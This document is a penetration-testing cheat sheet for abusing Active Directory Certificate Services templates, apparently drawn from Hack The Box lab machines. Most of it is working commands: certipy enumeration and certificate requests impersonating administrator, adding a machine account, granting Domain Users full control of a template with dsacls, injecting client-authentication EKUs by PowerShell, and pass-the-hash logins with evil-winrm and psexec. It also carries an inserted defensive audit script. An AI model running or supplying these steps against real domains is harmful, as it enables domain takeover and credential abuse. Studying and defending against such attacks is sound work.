# Certificate Authority Vulnerable Cert

* [ ] Is it vulnerable?
  * [ ] `certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3` Tip: <https://github.com/ly4k/Certipy>

The vulnerable template may grant enrollment rights to Domain Computers (or another computer group) rather than to users. In that case you need a computer account; you can create one for this purpose, provided the machine account quota allows it.

**Find machine account quota:** `nxc ldap authority -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M MAQ`

**Add a computer:** `impacket-addcomputer -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host authority -domain-netbios 'authority.htb' 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'`

* [ ] certipy-ad
  * [ ] `certipy-ad req -ca AUTHORITY-CA -target authority.authority.htb -template CorpVPN -upn administrator -username ATTACKERSYSTEM$ -password 'Summer2018!'`
  * [ ] `certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.228.253`
  * [ ] `evil-winrm -u 'administrator' -H a52f78e4c751e5f5e17e1e9f3e58f4ee -i dc` or `impacket-psexec -hashes a52f78e4c751e5f5e17e1e9f3e58f4ee:a52f78e4c751e5f5e17e1e9f3e58f4ee administrator@dc`
* [ ] certify.exe: <https://github.com/GhostPack/Certify?tab=readme-ov-file#example-walkthrough>

**Break out the key and pem from the pfx:** WinRM over SSL can use certificate authentication

* A pfx file holds both the certificate (public key) and the private key.
* evil-winrm requires these to be split into separate files: one for the certificate, one for the private key.
* Inspect the pfx: `openssl pkcs12 -in file.pfx -info`
* pfx2john (if the pfx is password protected)
* Extract the private key: `openssl pkcs12 -in file.pfx -nocerts -out privkey.pem -nodes`
* Extract the certificate: `openssl pkcs12 -in file.pfx -nokeys -out pubcert.cert`
* `evil-winrm -S -c pubcert.cert -k privkey.pem -i dc01`

---

#### WriteDacl on Cert

<https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates>

List the certificate templates in the configuration partition: `ldapsearch -LLL -H ldap://htb.local -b 'cn=configuration,dc=htb,dc=local' -D 'amanda@htb.local' -w 'Ashare1972' -s sub '(objectclass=pkicertificatetemplate)' '*'`

#### Set full control for all users

Do not do this in a pentest; give the right to a single principal instead. `dsacls "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL" /G "HTB\Domain Users:GA"`

#### Add OIDs

```powershell
# Import Active Directory Module
Import-Module ActiveDirectory

# Define the distinguished name (DN) of the certificate template
$dn = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"

# Define the application policies to add
$policies = @("1.3.6.1.5.5.7.3.2","1.3.6.1.5.5.7.3.4","1.3.6.1.4.1.311.10.3.4")

# Get the existing application policies (if any)
$currentPolicies = (Get-ADObject -Identity $dn -Properties "msPKI-Certificate-Application-Policy")."msPKI-Certificate-Application-Policy"

# Merge any existing policies with the new ones (keep $null on the left so an array is not unrolled)
if ($null -ne $currentPolicies) { $policies += $currentPolicies | Where-Object { $_ -notin $policies } }

# Update the certificate template with the merged application policies
Set-ADObject -Identity $dn -Replace @{ "msPKI-Certificate-Application-Policy" = $policies }
```
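A defender's audit of a single template, added here as an example that is not part of this playbook: it reads the SSL template DN used in the dsacls example (assumed; change it for your forest) and reports whether the requester may supply the subject, which client-authentication EKUs the template carries, and which broad groups (an assumed list) hold enrollment or edit rights on it.

```powershell
# Added example (not part of the original playbook): audit one certificate template
# for the combination this page calls a "vulnerable cert": the requester may supply
# the subject, the template carries a client-authentication EKU, and a broad group
# holds enrollment rights. Broad groups that can only edit the template (the WriteDacl
# case above) are listed in BroadRightsHolders but do not set Exposed on their own.
Import-Module ActiveDirectory

# Template DN copied from the dsacls example above; assumed, change it for your forest.
$dn = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"

$EnrolleeSuppliesSubject = 0x1                                   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
$ClientAuthOids = @(
    "1.3.6.1.5.5.7.3.2",                                         # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",                                    # Smart Card Logon
    "1.3.6.1.5.2.3.4",                                           # PKINIT Client Authentication
    "2.5.29.37.0"                                                # Any Purpose
)
$EnrollRightGuid = [guid]"0e10c968-78fb-11d1-a9c7-0000f80367c1"  # Certificate-Enrollment extended right
$BroadPrincipals = "Authenticated Users", "Domain Users", "Domain Computers", "Everyone"  # assumed list

$t = Get-ADObject -Identity $dn -Properties "msPKI-Certificate-Name-Flag", "msPKI-Certificate-Application-Policy", "pKIExtendedKeyUsage", "nTSecurityDescriptor"

$supplies   = ($t."msPKI-Certificate-Name-Flag" -band $EnrolleeSuppliesSubject) -ne 0
$ekus       = @($t."msPKI-Certificate-Application-Policy") + @($t.pKIExtendedKeyUsage)
$clientAuth = @($ekus | Where-Object { $_ -in $ClientAuthOids })

# Allow ACEs held by a broad group that grant Enroll (extended right scoped to the
# Enrollment GUID, or unscoped) or that let the holder rewrite the template itself.
$risky = @(foreach ($ace in $t.nTSecurityDescriptor.Access) {
    if ($ace.AccessControlType -ne "Allow") { continue }
    $name = $ace.IdentityReference.Value.Split("\")[-1]
    if ($name -notin $BroadPrincipals) { continue }
    $rights    = $ace.ActiveDirectoryRights.ToString()
    $canEnroll = ($rights -match "ExtendedRight|GenericAll") -and
                 ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $EnrollRightGuid)
    $canEdit   = $rights -match "GenericAll|WriteDacl|WriteOwner|WriteProperty"
    if ($canEnroll -or $canEdit) { [pscustomobject]@{ Principal = $name; Rights = $rights } }
})

[pscustomobject]@{
    Template                = $t.Name
    EnrolleeSuppliesSubject = $supplies
    ClientAuthEKUs          = ($clientAuth -join ",")
    BroadRightsHolders      = (($risky | ForEach-Object { "$($_.Principal):$($_.Rights)" }) -join "; ")
    Exposed                 = ($supplies -and ($clientAuth.Count -gt 0) -and ($risky.Count -gt 0))
}
```

Run it as a user with read access to the configuration partition; a template that reports Exposed = True, or any broad group with edit rights, is the condition the earlier sections of this page abuse and should be remediated by narrowing the template ACL.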

#### Request the cert

`certipy-ad req -u 'User' -p 'Password' -ca 'Certificate Authority' -template 'ESC4' -upn 'User you want the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP'`

#### Use the cert to get a TGT

`certipy-ad auth -pfx 'The user we got the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP'`

`certipy-ad auth -pfx sizzler.pfx -dc-ip 10.129.71.105 -dns-tcp -ldap-shell`
